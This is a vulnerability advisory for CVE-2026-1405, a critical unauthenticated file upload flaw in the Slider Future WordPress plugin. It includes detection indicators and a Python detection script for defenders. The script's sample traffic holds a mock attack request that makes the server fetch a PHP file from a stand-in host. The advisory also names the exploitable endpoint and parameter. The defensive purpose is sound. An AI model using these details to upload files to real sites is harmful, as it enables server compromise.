CVE-2026-1405
published 2026-02-19


Priority: P186 · Severity: critical 9.8 (CVSS 3.1)
Vector: AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Flags: ITW · EXPLOIT · VulnCheck KEV
Exploited in the wild
EPSS: 3.18% (86.4th percentile)
The Slider Future plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the 'slider_future_handle_image_upload' function in all versions up to, and including, 1.0.5. This makes it possible for unauthenticated attackers to upload arbitrary files on the affected site's server which may make remote code execution possible.

Affected (1 range)

Vendor          Product         Version range   Fixed in
franchidesign   slider_future   <= 1.0.5

Detection & IOCs (extracted from sources)

URL: /wp-json/slider-future/v1/upload-image/
  • Detect unauthenticated POST requests to the Slider Future upload endpoint /wp-json/slider-future/v1/upload-image/ with a JSON body containing an 'image_url' key — no authentication headers required.
  • A successful exploit response will return HTTP 200 with Content-Type application/json and a body containing both 'url' and 'wp-content', indicating a file was fetched and stored under the WordPress uploads directory.
  • The vulnerable function is 'slider_future_handle_image_upload' — monitor for this function name in WordPress debug logs or stack traces as evidence of exploitation attempts.
  • Out-of-band interaction (HTTP or DNS callback) via interactsh/OAST is used by exploit templates to confirm SSRF-assisted file fetch; monitor for unexpected outbound HTTP/DNS from the WordPress server triggered by this endpoint.
  • Vulnerability affects all versions up to and including 1.0.5 of the Slider Future WordPress plugin; versions beyond 1.0.5 are not affected.
  • Exploitation requires no authentication whatsoever — any unauthenticated network attacker can trigger the upload endpoint.
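The indicators above can be turned into a detection check over request/response records. The code below is an added example written for this page, not code from the page's source feeds or from the plugin itself; it assumes a log source that records full request and response bodies (a WAF or reverse proxy in front of WordPress). The endpoint path, the 'image_url' key and the success markers come from the IOC list above; the trusted-host allowlist, the HttpExchange record shape and the sample exchanges are constructed for the example.

```python
"""Detection logic for CVE-2026-1405 indicators, run over constructed
request/response records (added example, not from the advisory)."""
import json
from dataclasses import dataclass
from urllib.parse import urlsplit

# Endpoint named in the IOC list (trailing slash normalised away below).
UPLOAD_ENDPOINT = "/wp-json/slider-future/v1/upload-image"

# Hypothetical allowlist: hosts the site legitimately fetches images from.
TRUSTED_FETCH_HOSTS = {"cdn.example.com"}


@dataclass
class HttpExchange:
    """One request/response pair as a WAF or reverse proxy might log it (constructed shape)."""
    src_ip: str
    method: str
    path: str
    request_headers: dict
    request_body: str
    status: int
    response_headers: dict
    response_body: str


def _header(headers, name):
    """Case-insensitive header lookup; empty string when absent."""
    for key, value in headers.items():
        if key.lower() == name.lower():
            return value
    return ""


def is_authenticated(headers):
    """Heuristic: WordPress REST calls are authenticated via an Authorization header
    (application passwords, tokens) or an X-WP-Nonce with cookie auth."""
    return bool(_header(headers, "Authorization") or _header(headers, "X-WP-Nonce"))


def classify(ex):
    """Return the indicator strings matched by one exchange (empty if none)."""
    findings = []
    if ex.method.upper() != "POST":
        return findings
    if urlsplit(ex.path).path.rstrip("/") != UPLOAD_ENDPOINT:
        return findings
    try:
        body = json.loads(ex.request_body or "")
    except json.JSONDecodeError:
        body = None
    image_url = body.get("image_url") if isinstance(body, dict) else None
    # Indicator 1: anonymous POST carrying image_url to the upload endpoint.
    if image_url is not None and not is_authenticated(ex.request_headers):
        findings.append("unauthenticated image_url POST to Slider Future upload endpoint")
    # Indicator 4: the fetch target is where the server will reach out (the OAST/SSRF signal).
    if isinstance(image_url, str):
        host = urlsplit(image_url).hostname or ""
        if host and host not in TRUSTED_FETCH_HOSTS:
            findings.append(f"server-side fetch of untrusted host {host}")
    # Indicator 2: HTTP 200 JSON body naming a stored file under wp-content.
    ctype = _header(ex.response_headers, "Content-Type")
    if (ex.status == 200 and ctype.startswith("application/json")
            and "url" in ex.response_body and "wp-content" in ex.response_body):
        findings.append("response indicates file stored under wp-content")
    return findings


def is_likely_exploit(ex):
    """High confidence only when the anonymous request AND the success marker both match."""
    found = classify(ex)
    return (any(f.startswith("unauthenticated") for f in found)
            and any(f.startswith("response indicates") for f in found))


def scan(exchanges):
    """Return (src_ip, findings) for every exchange that matched at least one indicator."""
    results = []
    for ex in exchanges:
        found = classify(ex)
        if found:
            results.append((ex.src_ip, found))
    return results


# Constructed sample traffic: one anonymous attempt that succeeded, one authenticated
# legitimate upload from a trusted host, one unrelated REST call.
SAMPLE_EXCHANGES = [
    HttpExchange("198.51.100.7", "POST", "/wp-json/slider-future/v1/upload-image/",
                 {"Content-Type": "application/json", "User-Agent": "curl/8.0"},
                 '{"image_url": "http://oast.example.net/x.php"}',
                 200, {"Content-Type": "application/json; charset=UTF-8"},
                 '{"url": "https://shop.example.com/wp-content/uploads/2026/02/x.php"}'),
    HttpExchange("203.0.113.5", "POST", "/wp-json/slider-future/v1/upload-image/",
                 {"Content-Type": "application/json", "X-WP-Nonce": "abc123"},
                 '{"image_url": "https://cdn.example.com/banner.jpg"}',
                 200, {"Content-Type": "application/json; charset=UTF-8"},
                 '{"url": "https://shop.example.com/wp-content/uploads/2026/02/banner.jpg"}'),
    HttpExchange("192.0.2.9", "GET", "/wp-json/wp/v2/posts", {}, "", 200,
                 {"Content-Type": "application/json"}, "[]"),
]

if __name__ == "__main__":
    for src_ip, found in scan(SAMPLE_EXCHANGES):
        print(src_ip, found)
```

The authenticated exchange still produces the "file stored under wp-content" marker on its own, because a legitimate upload returns the same shape of response; that is why is_likely_exploit requires the anonymous-request indicator as well before raising confidence. The host allowlist is the knob to tune for a given site: any fetch to a host outside it is the point at which the out-of-band callback described in the IOC list would occur.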

CVSS provenance

NVD (v3.1): 9.8 CRITICAL — CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
VulnCheck: 9.8 CRITICAL